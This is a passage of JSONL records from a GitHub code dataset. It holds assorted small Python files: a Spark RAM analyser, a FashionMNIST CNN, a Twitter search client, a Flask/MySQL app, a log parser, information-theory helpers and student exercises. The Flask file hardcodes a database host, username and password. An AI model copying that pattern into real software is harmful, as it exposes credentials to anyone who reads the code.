x[0]).collect()\n \n metrics = computeMetrics(data)\n relativeEfficency = metrics[\"integral\"]/(metrics[\"max\"]*metrics[\"num_data_points\"])\n absoluteEfficency = absoluteRamEfficency(sc, cassandraKeyspace, trialID, experimentID, containerID, hostID, metrics[\"integral\"], metrics[\"num_data_points\"])\n \n query = [{\"experiment_id\":experimentID, \"trial_id\":trialID, \"container_id\":containerID, \"container_name\":containerName, \"host_id\":hostID, \\\n \"ram_mode\":mode[0], \"ram_mode_freq\":mode[1], \"ram_integral\":metrics[\"integral\"], \\\n \"relative_efficency\":relativeEfficency, \"absolute_efficency\":absoluteEfficency, \\\n \"ram_mean\":metrics[\"mean\"], \"ram_num_data_points\":metrics[\"num_data_points\"], \\\n \"ram_min\":metrics[\"min\"], \"ram_max\":metrics[\"max\"], \"ram_sd\":metrics[\"sd\"], \"ram_variance\":metrics[\"variance\"], \\\n \"ram_q1\":metrics[\"q1\"], \"ram_q2\":metrics[\"q2\"], \"ram_q3\":metrics[\"q3\"], \"ram_p95\":metrics[\"p95\"], \\\n \"ram_me\":metrics[\"me\"], \"ram_ci095_min\":metrics[\"ci095_min\"], \"ram_ci095_max\":metrics[\"ci095_max\"], \\\n \"ram_p90\":metrics[\"p90\"], \"ram_p99\":metrics[\"p99\"], \"ram_percentiles\":metrics[\"percentiles\"]}]\n return query\n\ndef main():\n #Takes arguments\n args = json.loads(sys.argv[1])\n trialID = str(args[\"trial_id\"])\n experimentID = str(args[\"experiment_id\"])\n configFile = str(args[\"config_file\"])\n containerID = str(args[\"container_id\"])\n containerName = str(args[\"container_name\"])\n hostID = str(args[\"host_id\"])\n cassandraKeyspace = str(args[\"cassandra_keyspace\"])\n partitionsPerCore = 5\n \n # Set configuration for spark context\n conf = SparkConf().setAppName(\"Ram trial analyser\")\n sc = CassandraSparkContext(conf=conf)\n \n #Source and destination tables\n srcTable = \"environment_data\"\n destTable = \"trial_ram\"\n \n #Obtain data for computations\n dataRDD = sc.cassandraTable(cassandraKeyspace, srcTable) \\\n .select(\"memory_usage\") \\\n .where(\"trial_id=? AND experiment_id=? AND container_id=? AND host_id=?\", trialID, experimentID, containerID, hostID) \\\n .filter(lambda r: r[\"memory_usage\"] is not None) \\\n .map(lambda r: (r['memory_usage'], 1)) \\\n .repartition(sc.defaultParallelism * partitionsPerCore) \\\n .cache()\n \n #Create Cassandra query\n query = createQuery(dataRDD, sc, cassandraKeyspace, experimentID, trialID, containerID, containerName, hostID)\n \n #Save to Cassandra\n sc.parallelize(query, sc.defaultParallelism * partitionsPerCore).saveToCassandra(cassandraKeyspace, destTable)\n \nif __name__ == '__main__':\n main()","repo_name":"benchflow/analysers","sub_path":"analysers/trials/ram.py","file_name":"ram.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24105067754","text":"import torch\nfrom torchvision import datasets, transforms\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))\n ])\n\n# Download and load the training data\ntrainset = datasets.FashionMNIST('MNIST_data/', download = True, train = True, transform = transform)\ntestset = datasets.FashionMNIST('MNIST_data/', download = True, train = False, transform = transform)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size = 64, shuffle = True)\ntestloader = torch.utils.data.DataLoader(testset, batch_size = 64, shuffle = True)\n\ndevice = torch.device(\"cuda:0\")\n\n\n\nclass ConvNN(nn.Module):\n def __init__(self):\n super(ConvNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, padding=1) #32x14x14\n self.conv1_2 = nn.Conv2d(32, 32, 3, padding=1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 64, 3, padding=1) #64x7x7\n self.conv2_2 = nn.Conv2d(64, 64, 3, padding=1)\n self.bn2 = nn.BatchNorm2d(64)\n self.maxpool = nn.MaxPool2d(2, 2)\n self.conv3 = nn.Conv2d(64, 128, 3, padding=1) #128x7x7\n self.conv3_2 = nn.Conv2d(128, 128, 3, padding=1)\n self.bn3 = nn.BatchNorm2d(128)\n self.conv4 = nn.Conv2d(128, 256, 3, padding=1)\n self.conv4_2 = nn.Conv2d(256, 256, 7) #256x1x1\n self.bn4 = nn.BatchNorm2d(256)\n self.fc1 = nn.Linear(256, 64)\n self.fc2 = nn.Linear(64, 10)\n\n def forward(self, x):\n x = F.leaky_relu(self.conv1(x), negative_slope=0.01)\n x = F.leaky_relu(self.maxpool(self.bn1(self.conv1_2(x))), negative_slope=0.01)\n x = F.leaky_relu(self.conv2(x), negative_slope=0.01)\n x = F.leaky_relu(self.maxpool(self.bn2(self.conv2_2(x))), negative_slope=0.01)\n x = F.leaky_relu(self.conv3(x), negative_slope=0.01)\n x = F.leaky_relu(self.bn3(self.conv3_2(x)), negative_slope=0.01)\n x = F.leaky_relu(self.conv4(x), negative_slope=0.01)\n x = F.leaky_relu(self.bn4(self.conv4_2(x)), negative_slope=0.01)\n x = x.view(x.size(0), -1)\n x = F.leaky_relu(self.fc1(x), negative_slope=0.01)\n x = self.fc2(x)\n\n return x\n\n#model = Network()\nmodel = ConvNN()\n\nmodel = model.to(device)\n\ncriterion = nn.CrossEntropyLoss()\n\n# Define the optimizer\noptimizer = optim.SGD(model.parameters(), lr = 0.0014)\n\nepochs = 35\n\ntrain_losses, test_losses = [], []\n\nfor e in range(epochs):\n running_loss = 0\n for images, labels in trainloader:\n\n images, labels = images.to(device), labels.to(device)\n # Training pass\n optimizer.zero_grad()\n\n output = model.forward(images)\n loss = criterion(output, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n else:\n test_loss = 0\n accuracy = 0\n\n # Turn off gradients for validation, saves memory and computation\n with torch.no_grad():\n # Set the model to evaluation mode\n model.eval()\n\n # Validation pass\n for images, labels in testloader:\n\n images, labels = images.to(device), labels.to(device)\n\n log_ps = model(images)\n test_loss += criterion(log_ps, labels)\n\n ps = torch.exp(log_ps)\n top_p, top_class = ps.topk(1, dim=1)\n equals = top_class == labels.view(*top_class.shape)\n accuracy += torch.mean(equals.type(torch.FloatTensor))\n\n model.train()\n train_losses.append(running_loss / len(trainloader))\n test_losses.append(test_loss / len(testloader))\n\n print(\"Epoch: {}/{}..\".format(e + 1, epochs),\n \"Training loss: {:.3f}..\".format(running_loss / len(trainloader)),\n \"Test loss: {:.3f}..\".format(test_loss / len(testloader)),\n \"Test Accuracy: {:.3f}\".format(accuracy / len(testloader)))\n\n\n","repo_name":"kyrylskichko/fashionMNIST_CNN","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26548106921","text":"from http_client import (HTTPClient, HTTPRequestData)\nfrom typing import (Optional, Any, Dict, List)\nfrom config import BEARER_TOKEN\nfrom urllib.parse import parse_qsl\nimport asyncio\nimport json\n\nclass TweetSearchResponse:\n def __init__(self, data: List[str], next_token: str):\n self.data = data\n self.next_token = next_token\n\n def __repr__(self):\n return f'Response(data = {self.data}, next_token = {self.next_token})'\n\nclass TwitterSearchService:\n def __init__(self, query: str, max_item_count: int):\n self.http_client = HTTPClient()\n self.bearer_token = BEARER_TOKEN\n self.next_token = ''\n self.query = query\n self.max_item_count = max_item_count\n self.__lock = asyncio.Lock()\n\n def __make_search_data(self, tweet: Any) -> str:\n text = tweet['text']\n\n if 'extended_tweet' in tweet:\n text = tweet['extended_tweet']['full_text']\n elif 'retweeted_status' in tweet:\n text = tweet['retweeted_status']['text']\n if 'extended_tweet' in tweet['retweeted_status']:\n text = tweet['retweeted_status']['extended_tweet']['full_text']\n\n return text\n\n async def __get_recent_tweet_search(self, params: Dict[str, any]) -> Optional[TweetSearchResponse]:\n headers: Dict[str, str] = {\n 'Authorization': f'Bearer {self.bearer_token}' \n }\n\n request_data = HTTPRequestData(\n 'https://api.twitter.com/1.1',\n path='/tweets/search/30day/dev.json',\n method='GET',\n params=params,\n headers=headers\n )\n\n json = await self.http_client.request(request_data)\n if json is None:\n return None\n\n if 'next' not in json:\n return None\n\n self.next_token = json['next']\n \n tweets = []\n tweets_temp = list(map(self.__make_search_data, json['results']))\n\n for t in tweets_temp:\n if t not in tweets:\n tweets.append(t)\n\n return TweetSearchResponse(data=tweets, next_token=self.next_token)\n\n async def get_next_results(self) -> Optional[TweetSearchResponse]:\n async with self.__lock:\n param = {\n 'query': f'\\\"{self.query}\\\" lang:id',\n 'maxResults': self.max_item_count\n }\n\n if self.next_token:\n param['next'] = self.next_token\n\n return await self.__get_recent_tweet_search(param)","repo_name":"99ridho/twitter-crawl","sub_path":"twitter_search_service.py","file_name":"twitter_search_service.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42102623040","text":"# programmers - Lv1 - 나누어떨어지는숫자 (2020-09-10)\n# https://programmers.co.kr/learn/courses/30/lessons/12903\n\nimport sys\nsys.stdin = open(\"programmers/[Lv1]나누어떨어지는숫자.txt\",'r')\n\ndef solution(arr, divisor):\n answer = []\n arr.sort()\n for a in arr:\n if a % divisor == 0 :\n answer.append(a)\n if len(answer) == 0:\n answer.append(-1) \n \n return answer\n\nT = int(input())\nfor _ in range(T):\n arr = list(map(int, input().split()))\n divisor = int(input())\n \n print(solution(arr, divisor)) \n\n","repo_name":"DailyCodingMem/DailyCoding","sub_path":"zjohn99/programmers/[Lv1]나누어떨어지는숫자.py","file_name":"[Lv1]나누어떨어지는숫자.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14840277284","text":"# main.py\nimport os\n\nimport pymysql\nfrom flask import render_template,request #新增request請求(下方用到)\nfrom flask import Flask\n\n\napp = Flask(__name__)\n# env_config = os.getenv( \"PROD_APP_SETTINGS\" , \"config.DevelopmentConfig\" )\n# app.config.from_object(env_config)\n\nconn = pymysql.connect(\n host='120.126.134.8',\n user='admin',\n password='g34552',\n db='web',\n charset='utf8',\n port=3305\n\n)\n\n@app.route('/IR_public.html')\ndef index():\n cur = conn.cursor()\n\n sql = \"select * from iframe where page_type='data_campus'\"\n cur.execute(sql)\n content_campus = cur.fetchall()\n\n sql2=\"select * from iframe where page_type='data_open'\"\n cur.execute(sql2)\n content_open=cur.fetchall()\n return render_template('IR_public.html',content_campus=content_campus,content_open=content_open)\n\n\n@app.route('/data_campus.html')\ndef page_compus():\n cur = conn.cursor()\n\n sql = \"select * from iframe where page_type='data_campus'\"\n cur.execute(sql)\n content_campus = cur.fetchall()\n\n sql2=\"select * from iframe where page_type='data_open'\"\n cur.execute(sql2)\n content_open=cur.fetchall()\n\n # result=[]\n # for row in content:\n # result.append(dict(zip([column[0] for column in cur.description],row)))\n # json_data=json.dumps(result)\n # json_data1 = json_data.encode('utf-8').decode('unicode_escape')\n # print(content)\n\n return render_template('data_campus.html',content_campus=content_campus,content_open=content_open)\n\n\n\n@app.route('/data_open.html')\ndef page_open():\n cur = conn.cursor()\n\n sql = \"select * from iframe where page_type='data_campus'\"\n cur.execute(sql)\n content_campus = cur.fetchall()\n\n sql2=\"select * from iframe where page_type='data_open'\"\n cur.execute(sql2)\n content_open=cur.fetchall()\n return render_template('data_open.html',content_campus=content_campus,content_open=content_open)\n\n\n\nif __name__ == \"__main__\":\n # https://www.youtube.com/watch?v=AiUzsr5JZgQ\n # from gevent import pywsgi\n # server = pywsgi.WSGIServer(('0.0.0.0',5000),app)\n # server.serve_forever()\n app.run('0.0.0.0',debug=True)\n","repo_name":"choumienmien/HTML_IR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4956192386","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\nfrom LogDTClass import LogDT\nfrom MeasureSysConverter import MeasureSysConverter\nfrom PacketSessionInfo import PacketSessionInfo\nfrom ParseApplicationProtocol import ParseApplicationProtocol\n\ndef ParsePAA (line, logObj,packetDictionary):\n dataOfPAA = ''\n length = len(line)\n packetConnectionContextID = 0\n initiator = -1\n protocolType = -1\n headerCompression = -1\n compression = -1\n if 2 < length:\n NumberOfContextID = 0\n if line[2] != '':\n NumberOfContextID = int(line[2]) \n \n logObj.event = \"Packet Session Connection Attempt\"\n logObj.msgType = \"Setup\"\n logObj.time = line[1] \n if (3 < length) and (line[3] != '') :\n packetConnectionContextID = int(line[3]) \n dataOfPAA = 'Packet Connection ID: ' + str(packetConnectionContextID) + ';'\n if ((3 + NumberOfContextID) < length) and (line[3+NumberOfContextID] != '') :\n logObj.applicationProtocol = ParseApplicationProtocol(int(line[3 + NumberOfContextID])) #add\n if NumberOfContextID > 0:\n if packetConnectionContextID in packetDictionary:\n packetInfo = packetDictionary[packetConnectionContextID]\n else:\n packetInfo = PacketSessionInfo()\n packetDictionary[packetConnectionContextID] = packetInfo\n packetInfo = packetDictionary[packetConnectionContextID]\n packetInfo.AttemptTime = line[1]\n packetInfo.applicationProtocol = logObj.applicationProtocol\n if ((4 + NumberOfContextID) < length) and (line[4+NumberOfContextID] != '') :\n initiator = int(line[4+NumberOfContextID])\n if initiator == 1:\n logObj.PSInitiator = \"Mobile station initiated\"\n elif initiator == 2:\n logObj.PSInitiator = \"Network station initiated\"\n else:\n logObj.PSInitiator = \"Unknown\"\n dataOfPAA += 'Initiator: ' + logObj.PSInitiator + ';'\n if ((5 + NumberOfContextID) < length) and (line[5+NumberOfContextID] != '') :\n protocolType = int(line[5+NumberOfContextID])\n if protocolType == 1:\n logObj.PSProtocolType = \"Mobile station initiated\"\n else:\n logObj.PSProtocolType = \"Unknown\"\n dataOfPAA += 'Protocol Type: ' + logObj.PSInitiator + ';'\n if ((6 + NumberOfContextID) < length) and (line[6+NumberOfContextID] != '') and (line[6+NumberOfContextID] != '\"\"') :\n logObj.APN = line[6+NumberOfContextID]\n dataOfPAA += 'APN: ' + logObj.APN + ';'\n if ((7 + NumberOfContextID) < length) and (line[7+NumberOfContextID] != '') and (line[7+NumberOfContextID] != '\"\"'):\n logObj.staticIP = line[7+NumberOfContextID]\n dataOfPAA += 'Static IP: ' + logObj.staticIP + ';'\n if ((8 + NumberOfContextID) < length) and (line[8+NumberOfContextID] != '') :\n headerCompression = int(line[8+NumberOfContextID])\n if headerCompression == 0:\n logObj.HeaderCompression = \"Off\"\n elif headerCompression == 1:\n logObj.HeaderCompression = \"On (manufacturer preferred compression) \"\n elif headerCompression == 2:\n logObj.HeaderCompression = \"RFC1144 (VanJacobsen)\"\n elif headerCompression == 3:\n logObj.HeaderCompression = \"RFC2507 (Degermark)\"\n elif headerCompression == 4:\n logObj.HeaderCompression = \"RFC3095 (RoHC)\"\n else:\n logObj.HeaderCompression = \"Unknown\"\n dataOfPAA += 'Header Compression: ' + logObj.HeaderCompression + ';'\n if ((9 + NumberOfContextID) < length) and (line[9+NumberOfContextID] != '') :\n compression = int(line[9+NumberOfContextID])\n if compression == 0:\n logObj.compression = \"Off\"\n elif compression == 1:\n logObj.compression = \"On (manufacturer preferred compression) \"\n elif compression == 2:\n logObj.compression = \"V.42bis\"\n elif compression == 3:\n logObj.compression = \"V.44\"\n else:\n logObj.HeaderCompression = \"Unknown\"\n dataOfPAA += 'Compression: ' + logObj.compression + ';'\n logObj.eventInfo = dataOfPAA\n return 1 \n else:\n return 0\n# except:\n# return 0 \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"erssebaggala/Parser","sub_path":"ParsePAA.py","file_name":"ParsePAA.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10872115710","text":"from math import log\n\n\n########################################### POINTWISE ############################################\n\nlog_base = 2\n\ndef h(pr,a,logbase=2):\n # h(a)\n return -1*log(pr[a], logbase)\n\ndef h_cond(pr,a,b):\n # h(a|b)\n return -1*log(pr[a + ',' + b]/pr[b], log_base)\n\ndef info(pr,a,b):\n # i(a,b)\n return log(pr[a + ',' + b]/(pr[a]*pr[b]), log_base)\n\n\n########################################### PARTIAL ################################################\n\ndef i1(Pr,Al,a,b,inst):\n # just renaming\n return partial_info(Pr,Al,a,b,inst)\n\ndef i3(Pr,Al,a,b,inst):\n # from D.A. Butts, Network (2003)\n # \"stimulus-specific information\"\n num_inst = len(Al['y'])\n i3=0\n for j in range(num_inst):\n #if Al[a][j]==Al[a][inst]: #incld Al[a][inst]==Al[a][inst]\n i3 += Pr[j][a+','+b]/Pr[j][a] * i2(Pr,Al,a,b,j)\n # TODO: not quite, return to this though\n\n\ndef partial_info(Pr,Al,a,b,inst):\n # ie i1\n # |i(a,b)>b\n # Al[i]['x1'] = digit of input 1 at instance i\n i = info(Pr[inst],a,b)\n\n num_inst = len(Al['y'])\n num = 1\n bb = b.split(',')\n if len(bb) == 1:\n for j in range(num_inst):\n if inst != j and Al[bb[0]][j] == Al[bb[0]][inst]:\n i += info(Pr[j],a,b)\n num += 1\n else:\n assert(len(bb)==2)\n for j in range(num_inst):\n if inst != j and Al[bb[0]][j] == Al[bb[0]][inst] and Al[bb[1]][j] == Al[bb[1]][inst]:\n i += info(Pr[j],a,b)\n num += 1\n i /= num\n return i\n\n\ndef i2(Pr, Al, a, b, inst):\n # from DeWeese & Meister, I(A;B_inst)\n Hx = H(Pr,a)\n #if a=='x1,x2': Hx=H(Pr,a,logbase=4)\n num_inst = len(Al['y'])\n num = 1\n \n hx_y = h_cond(Pr[inst],a,b)\n bb = b.split(',')\n\n\n if len(bb) == 1:\n for j in range(num_inst):\n if inst != j and Al[b][j] == Al[b][inst]:\n hx_y += h_cond(Pr[j],a,b)\n num += 1\n else:\n assert(len(bb) == 2)\n for j in range(num_inst):\n if inst != j and Al[bb[0]][j] == Al[bb[0]][inst] and Al[bb[1]][j] == Al[bb[1]][inst]:\n hx_y += h_cond(Pr[j],a,b)\n num += 1\n\n hx_y /= num\n return Hx - hx_y\n\n\ndef non_Markv_dist_cond(pr, a,b,c):\n full_h_cond = h_cond(pr, a, b+',' +c)\n h_a = h(pr,a)\n markv_fwd = -1*log(pr[a+','+b]/pr[b] * pr[b+','+c]/pr[c],2)\n markv_rev = -1*log(pr[c+','+b]/pr[b] * pr[b+','+a]/pr[a],2)\n #print(markv_fwd,markv_rev)\n #return markv_fwd-markv_rev\n #return h_a - full_h_cond\n return markv_fwd - full_h_cond\n\n\ndef partial_info_1of3(Pr,Al,a,b,c,inst):\n # |i(a,bc)>c\n # Al[i]['x1'] = digit of input 1 at instance i\n # shit naming\n i = info(Pr[inst],a,b + ',' + c)\n\n num_inst = len(Al['y'])\n num = 1\n bb = b.split(',')\n assert( len(bb) == 1 ) #since bc is a unit\n\n for j in range(num_inst):\n if inst != j and Al[c][j] == Al[c][inst]:\n i += info(Pr[j],a,b + ',' + c)\n num += 1\n\n i /= num\n return i\n\n\n########################################### WHOLE #################################################\n\ndef H(Pr, a, logbase=2):\n num_inst = len(Pr)\n H = sum(h(Pr[i], a,logbase=logbase) for i in range(num_inst)) / num_inst\n return H\n\ndef H_cond(Pr,a,b):\n num_inst = len(Pr)\n H = sum(h_cond(Pr[i],a,b) for i in range(num_inst)) / num_inst\n return H\n\ndef Info(Pr,a,b):\n num_inst = len(Pr)\n I = sum(info(Pr[i],a,b)for i in range(num_inst)) / num_inst\n return I\n\n\n\n","repo_name":"chopper6/Info","sub_path":"src/info_fns.py","file_name":"info_fns.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26160338113","text":"nome = 'Joel'\r\nidade = 28\r\nnota = 8.5\r\ngosto_naranja = True\r\n\r\nprint('Oi, meu nome é', nome, ', tenho', idade, 'anos de idade.' +\r\n '\\nMinha nota em Matemática é', nota, 'e é', gosto_naranja, 'que eu gosto de laranjas.')\r\n\r\n# or\r\n\r\nprint(f'\\nHi, my name is {nome}, I have {idade} years old. + \\nMy grade in Math is {nota} and it is {gosto_naranja} that I like oranges.')\r\n\r\n\r\n#Associe uma variável k ao valor 8. Associe uma variável quadrado_k ao quadrado do valor associado à variável k.\r\nk = 8\r\nquadrado_k = k**2\r\nprint(quadrado_k)\r\n\r\n'''Associe uma váriavel z ao valor 256. \r\nAssocie uma variável divisao_zk ao resultado da divisão entre os valores associados às variáveis z e k.'''\r\nz = 256\r\ndivisao_zk = z/k\r\nprint(divisao_zk) ","repo_name":"gabrielcampanile/Python_Exercises","sub_path":"UNIFESP Python/01/exs03.py","file_name":"exs03.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14080607905","text":"# Codes and information scraped (2011-10-28) from:\n# http://epp.eurostat.ec.europa.eu/statistics_explained/index.php/Glossary:Country_codes\n\nMEMBER_STATES = (\n 'AT',\n 'BE',\n 'BG',\n 'CY',\n 'CZ',\n 'DE',\n 'DK',\n 'EE',\n 'EL',\n 'ES',\n 'FI',\n 'FR',\n 'HU',\n 'IE',\n 'IT',\n 'LT',\n 'LU',\n 'LV',\n 'MT',\n 'NL',\n 'PL',\n 'PT',\n 'RO',\n 'SE',\n 'SI',\n 'SK',\n 'UK', \n)\n\ndef is_member(iso_code, member_states=MEMBER_STATES):\n \"\"\"Return a boolean indicating whether country represented by `iso_code`\n is a member of the EU.\n\n >>> is_member('SE')\n True\n >>> is_member(u'SE')\n True\n >>> is_member('US')\n False\n >>> is_member('JP')\n False\n\n \"\"\"\n return iso_code in member_states\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","repo_name":"strange/django-country-utils","sub_path":"country_utils/eu.py","file_name":"eu.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"4719389075","text":"# module imports\nimport os\nimport csv\n#\n#\ncvspath = os.path.join(\"..\", \"PyPoll\", \"Resources\", \"PyPoll_Resources_election_data.csv\")\n# set variables\n#\n# Specify the file to write to\ntexttosave = os.path.join(\"..\", \"PyPoll\", \"Analysis\", \"Analysis_Election.txt\")\n#\ntot_votes = 0\ncandidate = \"\" \ncandidate_list = []\nvote_list = {}\npercent_lis =[]\nwinner = \"\"\nvote_ratio = 0\nvote_percent = 0\nwin_count = 0\n#\n#open CVS file\nwith open(cvspath, newline=\"\") as csvfile:\n\tcsvreader = csv.reader(csvfile, delimiter=\",\")\n\t# \n\t# read the header row\n\tcsv_header = next(csvreader)\n\t#\n\t#read each row of sheet\n\tfor row in csvreader:\n\n\t\t#count the total voters\n\t\ttot_votes += 1\n\n\t\tif row[2] not in candidate_list:\n\t\t\tcandidate_list.append(row[2])\n\t\t\tvote_list[row[2]]=0\n\t\t\n\t\tvote_list[row[2]] += 1\n\nprint(\"Election Results\")\nprint(\"------------------------\")\nprint(f\"Total Votes {tot_votes}\")\nprint(\"------------------------\")\nwith open(texttosave,\"w\") as textfile:\n Summary = (f\"\\nElection Results\\n\"\n f\"----------------------------------\\n\"\n f\"\\nTotal tot_votes: {tot_votes}\\n\"\n f\"----------------------------------\\n\")\n textfile.write(Summary)\n\n for candname,votecnt in vote_list.items(): \n votecnt = vote_list.get(candname)\n vote_ratio = float(votecnt)/float(tot_votes) * 100 \n\n if (votecnt > win_count):\n win_count = votecnt\n winner = candname\n\n print (f\"{candname}:{vote_ratio:.3f}% ({votecnt})\")\n textfile.write(f\"{candname}:{vote_ratio:.3f}% ({votecnt})\\n\")\n print (\"------------------------\")\n # find winner\n \n print(f\"Winner:{winner}\")\n\n Summary1 = (\n f\"--------------------------------\\n\" \n f\"\\nWinner: {winner}\\n\"\n )\n textfile.write(Summary1)\n\n\n\n\n\n\n\n\n","repo_name":"ghhyc/Python-Chanllenges","sub_path":"PyPoll/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18048688696","text":"from django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom .models import *\nfrom django.http import JsonResponse\n \n# Create your views here.\n\ndef home(request):\n return render(request, \"store/index.html\")\n\ndef collections(request):\n category = Category.objects.filter()\n context = {'category':category}\n return render(request, \"store/collections.html\",context)\n\n\ndef collectionsview(request,slug):\n if(Category.objects.filter(slug=slug)):\n prod = Product.objects.filter(subcategory__slug=slug)\n cname = Category.objects.filter(slug=slug).first()\n context = {'prod' : prod,'cname':cname}\n return render(request, \"store/products/index.html\",context)\n else:\n messages.warning(request, \"category not found \")\n return redirect('collections')\n \ndef productview(request,cat_slug,prod_slug ):\n if(Category.objects.filter(slug=cat_slug)):\n if(Product.objects.filter(slug=prod_slug,status=0)):\n prod = Product.objects.filter(slug=prod_slug,status=0).first\n context = {'prod':prod}\n else:\n messages.error(request,\"Product not found\")\n return redirect('collections')\n else:\n messages.error(request,\"Category not found\")\n return redirect('collections')\n return render(request, \"store/products/info.html\", context)\n\ndef prodlist(request):\n products = Product.objects.filter(status=0).values_list('name', flat=True)\n prodlist = list(products)\n\n return JsonResponse(prodlist, safe=False)\n\ndef searchproduct(req):\n if req.method == 'POST':\n q = req.POST.get('productsearch')\n product = Product.objects.filter(name__contains=q).first()\n if product:\n return redirect('collections/'+product.subcategory.slug+'/'+product.slug)\n else:\n messages.info(req, \"No product found with that name\")\n return redirect(req.META.get('HTTP_REFERER'))\n return redirect(req.META.get('HTTP_REFERER'))\n","repo_name":"zakaria0101/ecommerce-django","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18822071909","text":"import pandas as pd\nimport gzip\n\ninteresting = set(line.split()[0]\n for line in\n gzip.open('./GMGC10.data/GMGC10.card_resfam.tsv.gz', 'rt')\n if line[0] != '#')\n\nfirst_write = True\nwith gzip.open('selected.tsv.gz', 'wb') as out:\n for ch in pd.read_table('./GMGC10.data/GMGC10.sample-abundance.tsv.xz', index_col=0, chunksize=1_000_000):\n ch = ch[ch.index.map(interesting.__contains__)]\n if len(ch) == 0: continue\n ch.to_csv(out, sep='\\t', header=first_write)\n first_write = False\n","repo_name":"BigDataBiology/VideoTutorials","sub_path":"5__SelectGMGCAbundances/select-lines.py","file_name":"select-lines.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10061000148","text":"'''\r\nApplication that bounce circle from window borders\r\n- ruch odbijania sie w x - okey\r\n- ruch odbijania sie w y - okey\r\n- ruch odbijania sie w x i y - okey\r\n- tworzenie klas i obiektow - tzw. refaktoring\r\n\r\n'''\r\n\r\nimport graphics\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\n\r\ndef move_object_by_step(figure: graphics.Circle, dx: int = 1, dy: int = 1, repetitions: int = 10):\r\n while True:\r\n\r\n currentFigureCenter = figure.getCenter()\r\n print(currentFigureCenter.x, currentFigureCenter.y)\r\n\r\n if (currentFigureCenter.x + circleRadius >= winMain.getWidth()):\r\n dx = -dx\r\n if (currentFigureCenter.x - circleRadius <= 0):\r\n dx = -dx\r\n if (currentFigureCenter.y + circleRadius >= winMain.getHeight()):\r\n dy = -dy\r\n if (currentFigureCenter.y - circleRadius <= 0):\r\n dy = -dy\r\n figure.move(dx, dy)\r\n if (winMain.checkMouse()) != None:\r\n break\r\n sleep(0.03)\r\n\r\n\r\n\r\n\r\n#window parameters\r\nwindowWidth = 400\r\nwindowHeight = windowWidth\r\nwinMain = graphics.GraphWin(\r\n title='Bounce', width=windowWidth, height=windowHeight)\r\nwinMainColor = graphics.color_rgb(100, 200, 100)\r\nwinMain.setBackground(winMainColor)\r\n\r\n#picking up point for start\r\nmessage = graphics.Text(graphics.Point(\r\n winMain.getWidth()/2, 10), 'Click on place to start bouncing ball.')\r\nmessage.draw(winMain)\r\n\r\ncircleCenterPickUp = winMain.getMouse()\r\n\r\n#circle parameters and drawing first circle\r\ncircleCenter = graphics.Point(\r\n randint(circleRadius, winMain.width -\r\n circleRadius), randint(circleRadius, winMain.height - circleRadius))\r\ncircleRadius = randint(5, 40)\r\ncircle = graphics.Circle(circleCenterPickUp, circleRadius)\r\ncircleColor = graphics.color_rgb(20, 120, 20)\r\ncircle.setFill(circleColor)\r\ncircle.draw(winMain)\r\n\r\n#some message\r\nmessage.setSize(8)\r\nmessage.setText('Click anywhere in window to close window. Sometimes, click few times.')\r\n\r\n#randomize increments in move\r\ndx = randint(1, 10)\r\ndy = randint(1, 10)\r\n\r\n\r\n#moving circle around\r\nmove_object_by_step(circle, dx, dy, 250)\r\n\r\n\r\n# program ending\r\nwinMain.close()\r\n","repo_name":"arek-zeg/Bouncing-Ball","sub_path":"myscript_concept.py","file_name":"myscript_concept.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27951958740","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 22 15:12:59 2021\n\n@author: paco\n\"\"\"\n\n'''How to draw vectors\nfrom https://www.geeksforgeeks.org/quiver-plot-in-matplotlib/\n'''\n\n# Import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# Creating arrow\nx_pos = [0, 0] #first number corresponds 1 vector. 2 numbers? will draw 2 